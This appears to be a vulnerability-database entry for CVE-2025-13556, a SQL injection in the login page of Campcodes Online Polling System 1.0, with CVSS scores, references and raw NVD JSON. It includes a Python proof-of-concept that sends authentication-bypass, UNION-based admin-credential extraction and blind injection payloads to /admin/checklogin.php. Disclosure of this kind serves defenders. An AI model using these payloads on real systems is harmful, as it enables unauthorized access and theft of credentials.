CVE-2025-13556

Description

A flaw has been found in Campcodes Online Polling System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/checklogin.php. Executing a manipulation of the argument myusername can lead to sql injection. The attack can be launched remotely. The exploit has been published and may be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:campcodes:online_polling_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Campcodes Online Polling System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-13556 SQL Injection PoC
# Target: Campcodes Online Polling System 1.0
# Endpoint: /admin/checklogin.php
# Parameter: myusername (vulnerable to SQL Injection)

import requests
import sys

target_url = "http://target.com/admin/checklogin.php"

# PoC 1: Basic Authentication Bypass
payload_basic = "' OR '1'='1' --"
data_basic = {
    'myusername': payload_basic,
    'mypassword': 'anything'
}

print("[+] Testing Basic SQL Injection...")
response = requests.post(target_url, data=data_basic)
if 'admin' in response.text.lower() or response.status_code == 302:
    print("[!] Vulnerable! Authentication bypass possible")

# PoC 2: Union-based Injection to extract database version
payload_union = "' UNION SELECT NULL,version(),user(),database() --"
data_union = {
    'myusername': payload_union,
    'mypassword': 'test'
}

print("[+] Testing Union-based Injection...")
response = requests.post(target_url, data=data_union)
if '5.' in response.text or '8.' in response.text:
    print("[!] Database version information extracted!")

# PoC 3: Extract admin credentials
payload_extract = "' UNION SELECT NULL,username,password FROM admin --"
data_extract = {
    'myusername': payload_extract,
    'mypassword': 'test'
}

print("[+] Extracting admin credentials...")
response = requests.post(target_url, data=data_extract)
# Check response for admin credentials
print("[*] Check response content for extracted credentials")

# PoC 4: Boolean-based Blind Injection
def blind_injection(target, param, payload):
    data = {param: payload}
    response = requests.post(target, data=data)
    return len(response.text) > 100

# Test if application is vulnerable to blind injection
payload_blind = "' AND 1=1 --"
if blind_injection(target_url, 'myusername', payload_blind):
    print("[!] Application vulnerable to blind SQL injection")

print("\n[!] PoC completed. Further exploitation requires manual analysis.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13556
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13556
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13556/
[4] VulDB https://vuldb.com/cve/CVE-2025-13556
[5] https://github.com/ProgramShowMaker/CVE/issues/2
[6] https://vuldb.com/?ctiid.333323
[7] https://vuldb.com/?id.333323
[8] https://vuldb.com/?submit.696614
[9] https://www.campcodes.com/
[10] https://github.com/ProgramShowMaker/CVE/issues/2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13556", "sourceIdentifier": "[email protected]", "published": "2025-11-23T16:15:46.407", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Campcodes Online Polling System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/checklogin.php. Executing a manipulation of the argument myusername can lead to sql injection. The attack can be launched remotely. The exploit has been published and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:campcodes:online_polling_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "B9F9CF24-8D3D-4F78-A405-E6F5139459E3"}]}]}], "references": [{"url": "https://github.com/ProgramShowMaker/CVE/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.333323", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.333323", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.696614", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.campcodes.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/ProgramShowMaker/CVE/issues/2", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}